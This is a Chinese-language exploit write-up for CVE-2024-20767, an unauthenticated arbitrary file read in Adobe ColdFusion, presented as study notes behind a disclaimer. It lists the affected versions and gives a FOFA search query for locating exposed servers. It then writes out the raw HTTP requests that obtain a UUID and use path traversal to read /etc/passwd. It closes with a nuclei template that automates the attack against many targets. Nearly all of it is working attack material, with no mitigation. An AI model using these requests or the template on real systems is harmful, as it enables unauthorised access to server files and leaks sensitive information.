免责声明:
本文内容为学习笔记分享,仅供技术学习参考,请勿用作违法用途,任何个人和组织利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责,与作者无关!!!
漏洞描述
由于Adobe ColdFusion的访问控制不当,未经身份认证的远程攻击者可以构造恶意请求读取目标服务器上的任意文件,泄露敏感信息。
影响版本
ColdFusion 2021 <= Update 12 && ColdFusion 2023 <= Update 6
fofa语句
app="Adobe-ColdFusion" && title=="Error Occurred While Processing Request"
漏洞复现
打开页面
构造payload
请求获取uuid
GET /CFIDE/adminapi/_servermanager/servermanager.cfc?method=getHeartBeat HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close
使用获取的uuid进行文件读取
GET /pms?module=logging&file_name=../../../../../../../etc/passwd&number_of_lines=100 HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close
uuid: 85f60018-a654-4410-a783-f81cbd5000b9
nuclei批量验证
id: Adobe-ColdFusion-information-read
info:
name: Adobe ColdFusion 任意文件读取漏洞(CVE-2024-20767)
author: changge
severity: high
description: ColdFusion 2021 <= Update 12 && ColdFusion 2023 <= Update 6
metadata:
max-request: 1
fofa-query: app="Adobe-ColdFusion" && title=="Error Occurred While Processing Request"
verified: true
requests:
- raw:
- |
GET /CFIDE/adminapi/_servermanager/servermanager.cfc?method=getHeartBeat HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
- |
GET /pms?module=logging&file_name=../../../../../../../etc/passwd&number_of_lines=100 HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
uuid: {{uuid}}
extractors:
- type: regex
name: uuid
group: 1
internal: true
part: body
regex:
- "([0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12})"
matchers:
- type: dsl
dsl:
- "status_code_1 == 200 && contains(body_1, 'uuid') && status_code_2 == 200 && contains(body_2, 'root:')"